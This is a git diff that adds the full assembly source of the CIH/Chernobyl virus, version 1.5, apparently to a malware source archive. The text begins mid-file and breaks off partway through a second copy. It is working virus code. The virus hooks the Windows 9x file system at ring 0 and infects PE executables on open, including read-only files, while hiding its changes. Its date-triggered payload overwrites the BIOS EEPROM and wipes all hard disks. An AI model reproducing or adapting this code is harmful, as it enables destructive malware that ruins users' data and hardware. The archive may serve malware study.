+ dd 00400067h ; Use EAX, ECX, EDX, and flags
+ mov dr0, eax ; Save OldFileSystemApiHook Address
+ pop eax ; EAX = FileSystemApiHook Address
+ ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
+ mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
+ mov edx, [ecx]
+ mov OldInstallFileSystemApiHook-@3[eax], edx
+ ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
+ lea eax, InstallFileSystemApiHook-@3[eax]
+ mov [ecx], eax
+ cli
+ jmp ExitRing0Init
+
+; *********************************************************
+; * Code Size of Merge Virus Code Section *
+; *********************************************************
+
+CodeSizeOfMergeVirusCodeSection = offset $
+
+; *********************************************************
+; * IFSMgr_InstallFileSystemApiHook *
+; *********************************************************
+
+InstallFileSystemApiHook:
+ push ebx
+ call @4 ;
+@4: ;
+ pop ebx ; mov ebx, offset FileSystemApiHook
+ add ebx, FileSystemApiHook-@4 ;
+ push ebx
+ int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
+IFSMgr_RemoveFileSystemApiHook = $
+ dd 00400068h ; Use EAX, ECX, EDX, and flags
+ pop eax
+ ; Call Original IFSMgr_InstallFileSystemApiHook
+ ; to Link Client FileSystemApiHook
+ push dword ptr [esp+8]
+ call OldInstallFileSystemApiHook-@3[ebx]
+ pop ecx
+ push eax
+ ; Call Original IFSMgr_InstallFileSystemApiHook
+ ; to Link My FileSystemApiHook
+ push ebx
+ call OldInstallFileSystemApiHook-@3[ebx]
+ pop ecx
+ mov dr0, eax ; Adjust OldFileSystemApiHook Address
+ pop eax
+ pop ebx
+ ret
+
+; *********************************************************
+; * Static Data *
+; *********************************************************
+
+OldInstallFileSystemApiHook dd ? 
+
+; *********************************************************
+; * IFSMgr_FileSystemHook *
+; *********************************************************
+
+; *************************************
+; * IFSMgr_FileSystemHook Entry Point *
+; *************************************
+
+FileSystemApiHook:
+@3 = FileSystemApiHook
+
+ pushad
+ call @5 ;
+@5: ;
+ pop esi ; mov esi, offset VirusGameDataStartAddress
+ add esi, VirusGameDataStartAddress-@5
+
+; *************************************
+; * Is OnBusy !? *
+; *************************************
+
+ test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
+ jnz pIFSFunc ; goto pIFSFunc
+
+; *************************************
+; * Is OpenFile !? *
+; *************************************
+
+ ; if ( NotOpenFile )
+ ; goto prevhook
+ lea ebx, [esp+20h+04h+04h]
+ cmp dword ptr [ebx], 00000024h
+ jne prevhook
+
+; *************************************
+; * Enable OnBusy *
+; *************************************
+
+ inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
+
+; *************************************
+; * Get FilePath's DriveNumber, *
+; * then Set the DriveName to *
+; * FileNameBuffer. *
+; *************************************
+; * Ex. If DriveNumber is 03h, *
+; * DriveName is 'C:'. *
+; *************************************
+
+ add esi, FileNameBuffer-@6
+ push esi
+ mov al, [ebx+04h]
+ cmp al, 0ffh
+ je CallUniToBCSPath
+ add al, 40h
+ mov ah, ':'
+ mov [esi], eax
+ inc esi
+ inc esi
+
+; *************************************
+; * UniToBCSPath *
+; *************************************
+; * This Service Converts *
+; * a Canonicalized Unicode Pathname *
+; * to a Normal Pathname in the *
+; * Specified BCS Character Set. 
*
+; *************************************
+
+CallUniToBCSPath:
+ push 00000000h
+ push FileNameBufferSize
+ mov ebx, [ebx+10h]
+ mov eax, [ebx+0ch]
+ add eax, 04h
+ push eax
+ push esi
+ int 20h ; VXDCall UniToBCSPath
+UniToBCSPath = $
+ dd 00400041h
+ add esp, 04h*04h
+
+; *************************************
+; * Is FileName '.EXE' !? *
+; *************************************
+
+ cmp [esi+eax-04h], 'EXE.'
+ pop esi
+ jne DisableOnBusy
+
+IF DEBUG
+
+; *************************************
+; * Only for Debug *
+; *************************************
+
+ cmp [esi+eax-06h], 'KCUF'
+ jne DisableOnBusy
+
+ENDIF
+
+; *************************************
+; * Is Open Existing File !? *
+; *************************************
+
+ ; if ( NotOpenExistingFile )
+ ; goto DisableOnBusy
+ cmp word ptr [ebx+18h], 01h
+ jne DisableOnBusy
+
+; *************************************
+; * Get Attributes of the File *
+; *************************************
+
+ mov ax, 4300h
+ int 20h ; VXDCall IFSMgr_Ring0_FileIO
+IFSMgr_Ring0_FileIO = $
+ dd 00400032h
+ jc DisableOnBusy
+ push ecx
+
+; *************************************
+; * Get IFSMgr_Ring0_FileIO Address *
+; *************************************
+
+ mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
+ mov edi, [edi]
+
+; *************************************
+; * Is Read-Only File !? 
*
+; *************************************
+
+ test cl, 01h
+ jz OpenFile
+
+; *************************************
+; * Modify Read-Only File to Write *
+; *************************************
+
+ mov ax, 4301h
+ xor ecx, ecx
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Open File *
+; *************************************
+
+OpenFile:
+ xor eax, eax
+ mov ah, 0d5h
+ xor ecx, ecx
+ xor edx, edx
+ inc edx
+ mov ebx, edx
+ inc ebx
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+ xchg ebx, eax ; mov ebx, FileHandle
+
+; *************************************
+; * Need to Restore *
+; * Attributes of the File !? *
+; *************************************
+
+ pop ecx
+ pushf
+ test cl, 01h
+ jz IsOpenFileOK
+
+; *************************************
+; * Restore Attributes of the File *
+; *************************************
+
+ mov ax, 4301h
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Is Open File OK !? *
+; *************************************
+
+IsOpenFileOK:
+ popf
+ jc DisableOnBusy
+
+; *************************************
+; * Open File Already Succeed. ^__^ *
+; *************************************
+
+ push esi ; Push FileNameBuffer Address to Stack
+
+ pushf ; Now CF = 0, Push Flag to Stack
+
+ add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
+
+; ***************************
+; * Get OffsetToNewHeader *
+; ***************************
+
+ xor eax, eax
+ mov ah, 0d6h
+ ; For Doing Minimal VirusCode's Length,
+ ; I Save EAX to EBP.
+ mov ebp, eax
+ push 00000004h
+ pop ecx
+ push 0000003ch
+ pop edx
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+ mov edx, [esi]
+
+; ***************************
+; * Get 'PE\0' Signature *
+; * of ImageFileHeader, and *
+; * Infected Mark. *
+; ***************************
+
+ dec edx
+ mov eax, ebp
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; ***************************
+; * Is PE !? 
*
+; ***************************
+; * Is the File *
+; * Already Infected !? *
+; ***************************
+; * WinZip Self-Extractor *
+; * doesn't Have Infected *
+; * Mark Because My Virus *
+; * doesn't Infect it. *
+; ***************************
+
+ cmp dword ptr [esi], 00455000h
+ jne CloseFile
+
+; *************************************
+; * The File is ^o^ *
+; * PE(Portable Executable) indeed. *
+; *************************************
+; * The File isn't also Infected. *
+; *************************************
+
+; *************************************
+; * Start to Infect the File *
+; *************************************
+; * Registers Use Status Now : *
+; * *
+; * EAX = 04h *
+; * EBX = File Handle *
+; * ECX = 04h *
+; * EDX = 'PE\0\0' Signature of *
+; * ImageFileHeader Pointer's *
+; * Former Byte. *
+; * ESI = DataBuffer Address ==> @8 *
+; * EDI = IFSMgr_Ring0_FileIO Address *
+; * EBP = D600h ==> Read Data in File *
+; *************************************
+; * Stack Dump : *
+; * *
+; * ESP => ------------------------- *
+; * | EFLAG(CF=0) | *
+; * ------------------------- *
+; * | FileNameBufferPointer | *
+; * ------------------------- *
+; * | EDI | *
+; * ------------------------- *
+; * | ESI | *
+; * ------------------------- *
+; * | EBP | *
+; * ------------------------- *
+; * | ESP | *
+; * ------------------------- *
+; * | EBX | *
+; * ------------------------- *
+; * | EDX | *
+; * ------------------------- *
+; * | ECX | *
+; * ------------------------- *
+; * | EAX | *
+; * ------------------------- *
+; * | Return Address | *
+; * ------------------------- *
+; *************************************
+
+ push ebx ; Save File Handle
+ push 00h ; Set VirusCodeSectionTableEndMark
+
+; ***************************
+; * Let's Set the *
+; * Virus' Infected Mark *
+; ***************************
+
+ push 01h ; Size
+ push edx ; Pointer of File
+ push edi ; Address of Buffer
+
+; ***************************
+; * Save ESP Register *
+; 
***************************
+
+ mov dr1, esp
+
+; ***************************
+; * Let's Set the *
+; * NewAddressOfEntryPoint *
+; * ( Only First Set Size ) *
+; ***************************
+
+ push eax ; Size
+
+; ***************************
+; * Let's Read *
+; * Image Header in File *
+; ***************************
+
+ mov eax, ebp
+ mov cl, SizeOfImageHeaderToRead
+ add edx, 07h ; Move EDX to NumberOfSections
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; ***************************
+; * Let's Set the *
+; * NewAddressOfEntryPoint *
+; * ( Set Pointer of File, *
+; * Address of Buffer ) *
+; ***************************
+
+ lea eax, (AddressOfEntryPoint-@8)[edx]
+ push eax ; Pointer of File
+ lea eax, (NewAddressOfEntryPoint-@8)[esi]
+ push eax ; Address of Buffer
+
+; ***************************
+; * Move EDX to the Start *
+; * of SectionTable in File *
+; ***************************
+
+ movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
+ lea edx, [eax+edx+12h]
+
+; ***************************
+; * Let's Get *
+; * Total Size of Sections *
+; ***************************
+
+ mov al, SizeOfScetionTable
+ ; I Assume NumberOfSections <= 0ffh
+ mov cl, (NumberOfSections-@8)[esi]
+ mul cl
+
+; ***************************
+; * Let's Set Section Table *
+; ***************************
+
+ ; Move ESI to the Start of SectionTable
+ lea esi, (StartOfSectionTable-@8)[esi]
+ push eax ; Size
+ push edx ; Pointer of File
+ push esi ; Address of Buffer
+
+; ***************************
+; * The Code Size of Merge *
+; * Virus Code Section and *
+; * Total Size of Virus *
+; * Code Section Table Must *
+; * be Small or Equal the *
+; * Unused Space Size of *
+; * Following Section Table *
+; ***************************
+
+ inc ecx
+ push ecx ; Save NumberOfSections+1
+ shl ecx, 03h
+ push ecx ; Save TotalSizeOfVirusCodeSectionTable
+
+ add ecx, eax
+ add ecx, edx
+ sub ecx, (SizeOfHeaders-@9)[esi]
+ not ecx
+ inc ecx
+ ; Save My Virus First Section Code
+ ; Size of Following 
Section Table...
+ ; ( Not Include the Size of Virus Code Section Table )
+ push ecx
+ xchg ecx, eax ; ECX = Size of Section Table
+ ; Save Original Address of Entry Point
+ mov eax, (AddressOfEntryPoint-@9)[esi]
+ add eax, (ImageBase-@9)[esi]
+ mov (OriginalAddressOfEntryPoint-@9)[esi], eax
+ cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
+ jl OnlySetInfectedMark
+
+; ***************************
+; * Read All Section Tables *
+; ***************************
+
+ mov eax, ebp
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; ***************************
+; * Full Modify the Bug : *
+; * WinZip Self-Extractor *
+; * Occurs Error... *
+; ***************************
+; * So When User Opens *
+; * WinZip Self-Extractor, *
+; * Virus Doesn't Infect it.*
+; ***************************
+; * First, Virus Gets the *
+; * PointerToRawData in the *
+; * Second Section Table, *
+; * Reads the Section Data, *
+; * and Tests the String of *
+; * 'WinZip(R)'...... *
+; ***************************
+
+ xchg eax, ebp
+ push 00000004h
+ pop ecx
+ push edx
+ mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
+ add edx, 12h
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+ cmp dword ptr [esi], 'piZniW'
+ je NotSetInfectedMark
+ pop edx
+
+; ***************************
+; * Let's Set Total Virus *
+; * Code Section Table *
+; ***************************
+
+ ; EBX = My Virus First Section Code
+ ; Size of Following Section Table
+ pop ebx
+ pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
+ pop ecx ; ECX = NumberOfSections+1
+ push edi ; Size
+ add edx, ebp
+ push edx ; Pointer of File
+ add ebp, esi
+ push ebp ; Address of Buffer
+
+; ***************************
+; * Set the First Virus *
+; * Code Section Size in *
+; * VirusCodeSectionTable *
+; ***************************
+
+ lea eax, [ebp+edi-04h]
+ mov [eax], ebx
+
+; ***************************
+; * Let's Set My Virus *
+; * First Section Code *
+; ***************************
+
+ push ebx ; Size
+ add edx, edi
+ push edx ; 
Pointer of File
+ lea edi, (MyVirusStart-@9)[esi]
+ push edi ; Address of Buffer
+
+; ***************************
+; * Let's Modify the *
+; * AddressOfEntryPoint to *
+; * My Virus Entry Point *
+; ***************************
+
+ mov (NewAddressOfEntryPoint-@9)[esi], edx
+
+; ***************************
+; * Setup Initial Data *
+; ***************************
+
+ lea edx, [esi-SizeOfScetionTable]
+ mov ebp, offset VirusSize
+ jmp StartToWriteCodeToSections
+
+; ***************************
+; * Write Code to Sections *
+; ***************************
+
+LoopOfWriteCodeToSections:
+
+ add edx, SizeOfScetionTable
+ mov ebx, (SizeOfRawData-@9)[edx]
+ sub ebx, (VirtualSize-@9)[edx]
+ jbe EndOfWriteCodeToSections
+ push ebx ; Size
+ sub eax, 08h
+ mov [eax], ebx
+ mov ebx, (PointerToRawData-@9)[edx]
+ add ebx, (VirtualSize-@9)[edx]
+ push ebx ; Pointer of File
+ push edi ; Address of Buffer
+ mov ebx, (VirtualSize-@9)[edx]
+ add ebx, (VirtualAddress-@9)[edx]
+ add ebx, (ImageBase-@9)[esi]
+ mov [eax+4], ebx
+ mov ebx, [eax]
+ add (VirtualSize-@9)[edx], ebx
+
+ ; Section contains initialized data ==> 00000040h
+ ; Section can be Read. 
==> 40000000h
+ or (Characteristics-@9)[edx], 40000040h
+
+StartToWriteCodeToSections:
+
+ sub ebp, ebx
+ jbe SetVirusCodeSectionTableEndMark
+ add edi, ebx ; Move Address of Buffer
+
+EndOfWriteCodeToSections:
+
+ loop LoopOfWriteCodeToSections
+
+; ***************************
+; * Only Set Infected Mark *
+; ***************************
+
+OnlySetInfectedMark:
+ mov esp, dr1
+ jmp WriteVirusCodeToFile
+
+; ***************************
+; * Not Set Infected Mark *
+; ***************************
+
+NotSetInfectedMark:
+ add esp, 3ch
+ jmp CloseFile
+
+; ***************************
+; * Set Virus Code *
+; * Section Table End Mark *
+; ***************************
+
+SetVirusCodeSectionTableEndMark:
+
+ ; Adjust Size of Virus Section Code to Correct Value
+ add [eax], ebp
+ add [esp+08h], ebp
+
+ ; Set End Mark
+ xor ebx, ebx
+ mov [eax-04h], ebx
+
+; ***************************
+; * When VirusGame Calls *
+; * VxDCall, VMM Modifies *
+; * the 'int 20h' and the *
+; * 'Service Identifier' *
+; * to 'Call [XXXXXXXX]'. *
+; ***************************
+; * Before Writing My Virus *
+; * to File, I Must Restore *
+; * them First. 
^__^ *
+; ***************************
+
+ lea eax, (LastVxDCallAddress-2-@9)[esi]
+ mov cl, VxDCallTableSize
+
+LoopOfRestoreVxDCallID:
+ mov word ptr [eax], 20cdh
+ mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
+ mov [eax+2], edx
+ movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
+ sub eax, edx
+ loop LoopOfRestoreVxDCallID
+
+; ***************************
+; * Let's Write *
+; * Virus Code to the File *
+; ***************************
+
+WriteVirusCodeToFile:
+ mov eax, dr1
+ mov ebx, [eax+10h]
+ mov edi, [eax]
+
+LoopOfWriteVirusCodeToFile:
+
+ pop ecx
+ jecxz SetFileModificationMark
+ mov esi, ecx
+ mov eax, 0d601h
+ pop edx
+ pop ecx
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+ jmp LoopOfWriteVirusCodeToFile
+
+; ***************************
+; * Let's Set CF = 1 ==> *
+; * Need to Restore File *
+; * Modification Time *
+; ***************************
+
+SetFileModificationMark:
+ pop ebx
+ pop eax
+ stc ; Enable CF(Carry Flag)
+ pushf
+
+; *************************************
+; * Close File *
+; *************************************
+
+CloseFile:
+ xor eax, eax
+ mov ah, 0d7h
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Need to Restore File Modification *
+; * Time !? 
*
+; *************************************
+
+ popf
+ pop esi
+ jnc IsKillComputer
+
+; *************************************
+; * Restore File Modification Time *
+; *************************************
+
+ mov ebx, edi
+ mov ax, 4303h
+ mov ecx, (FileModificationTime-@7)[esi]
+ mov edi, (FileModificationTime+2-@7)[esi]
+ call ebx ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Disable OnBusy *
+; *************************************
+
+DisableOnBusy:
+ dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
+
+; *************************************
+; * Call Previous FileSystemApiHook *
+; *************************************
+
+prevhook:
+ popad
+ mov eax, dr0 ;
+ jmp [eax] ; Jump to prevhook
+
+; *************************************
+; * Call the Function that the IFS *
+; * Manager Would Normally Call to *
+; * Implement this Particular I/O *
+; * Request. *
+; *************************************
+
+pIFSFunc:
+ mov ebx, esp
+ push dword ptr [ebx+20h+04h+14h] ; Push pioreq
+ call [ebx+20h+04h] ; Call pIFSFunc
+ pop ecx ;
+ mov [ebx+1ch], eax ; Modify EAX Value in Stack
+
+; ***************************
+; * After Calling pIFSFunc, *
+; * Get Some Data from the *
+; * Returned pioreq. *
+; ***************************
+
+ cmp dword ptr [ebx+20h+04h+04h], 00000024h
+ jne QuitMyVirusFileSystemHook
+
+; *****************
+; * Get the File *
+; * Modification *
+; * Date and Time *
+; * in DOS Format.*
+; *****************
+
+ mov eax, [ecx+28h]
+ mov (FileModificationTime-@6)[esi], eax
+
+; ***************************
+; * Quit My Virus' *
+; * IFSMgr_FileSystemHook *
+; ***************************
+
+QuitMyVirusFileSystemHook:
+
+ popad
+ ret
+
+; *************************************
+; * Kill Computer !? ... *^_^* *
+; *************************************
+
+IsKillComputer:
+ ; Get Now Day from BIOS CMOS
+ mov al, 07h
+ out 70h, al
+ in al, 71h
+ xor al, 01h ; ??/26/???? 
+
+IF DEBUG
+ jmp DisableOnBusy
+ELSE
+ jnz DisableOnBusy
+ENDIF
+
+; **************************************
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; **************************************
+
+; ***************************
+; * Kill BIOS EEPROM *
+; ***************************
+
+ mov bp, 0cf8h
+ lea esi, IOForEEPROM-@7[esi]
+
+; ***********************
+; * Show BIOS Page in *
+; * 000E0000 - 000EFFFF *
+; * ( 64 KB ) *
+; ***********************
+
+ mov edi, 8000384ch
+ mov dx, 0cfeh
+ cli
+ call esi
+
+; ***********************
+; * Show BIOS Page in *
+; * 000F0000 - 000FFFFF *
+; * ( 64 KB ) *
+; ***********************
+
+ mov di, 0058h
+ dec edx ; and al,0fh
+ mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
+ call esi
+
+; ***********************
+; * Show the BIOS Extra *
+; * ROM Data in Memory *
+; * 000E0000 - 000E01FF *
+; * ( 512 Bytes ) *
+; * , and the Section *
+; * of Extra BIOS can *
+; * be Writted... 
*
+; ***********************
+
+ lea ebx, EnableEEPROMToWrite-@10[esi]
+ mov eax, 0e5555h
+ mov ecx, 0e2aaah
+ call ebx
+ mov byte ptr [eax], 60h
+ push ecx
+ loop $
+
+; ***********************
+; * Kill the BIOS Extra *
+; * ROM Data in Memory *
+; * 000E0000 - 000E007F *
+; * ( 80h Bytes ) *
+; ***********************
+
+ xor ah, ah
+ mov [eax], al
+
+ xchg ecx, eax
+ loop $
+
+; ***********************
+; * Show and Enable the *
+; * BIOS Main ROM Data *
+; * 000E0000 - 000FFFFF *
+; * ( 128 KB ) *
+; * can be Writted... *
+; ***********************
+
+ mov eax, 0f5555h
+ pop ecx
+ mov ch, 0aah
+ call ebx
+ mov byte ptr [eax], 20h
+
+ loop $
+
+; ***********************
+; * Kill the BIOS Main *
+; * ROM Data in Memory *
+; * 000FE000 - 000FE07F *
+; * ( 80h Bytes ) *
+; ***********************
+
+ mov ah, 0e0h
+ mov [eax], al
+
+; ***********************
+; * Hide BIOS Page in *
+; * 000F0000 - 000FFFFF *
+; * ( 64 KB ) *
+; ***********************
+ ; or al,10h
+ mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
+ call esi
+
+; ***************************
+; * Kill All HardDisk *
+; ***************************************************
+; * IOR Structure of IOS_SendCommand Needs *
+; ***************************************************
+; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
+; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
+; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
+; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
+; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? 
* +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + out dx, al + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand' + +; ********************************************************* +; * Virus Size * +; 
********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? 
+SizeOfImageHeaderToRead = $-NumberOfSections +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite= 04h +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) +; ********************************************************* + +VirusGame ENDS + END FileHeader diff --git a/MSDOS/Virus.MSDOS.Unknown.cih15_2.asm b/MSDOS/Virus.MSDOS.Unknown.cih15_2.asm new file mode 100644 index 00000000..a03c5e14 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih15_2.asm 
@@ -0,0 +1,1402 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Source : TTIT of TATUNG in Taiwan * +; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net * +; * Modification Time : 06/01/1998 Version : 1.5 * +; * * +; * Turbo Assembler Version 5.0 : Tasm /m cih * +; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. 
Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; *==========================================================================* +; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * +; * So When Open WinZip Self-Extractor ==> Don't Infect it. * +; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * +; *==========================================================================* +; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * +; * 2. Change the Date of Killing Computers. * +; * 05/31/1998 3. Modify Virus Version Copyright. * +; * 4. The Virus "Basic" Size is 1019 Bytes. * +; **************************************************************************** +; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port * +; * 2. Modify Virus Version Copyright. * +; * 06/01/1998 3. Clear Garbage in Source Code. * +; * 4. The Virus "Small" Size in 10xx Bytes. 
* +; **************************************************************************** + + .586 + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 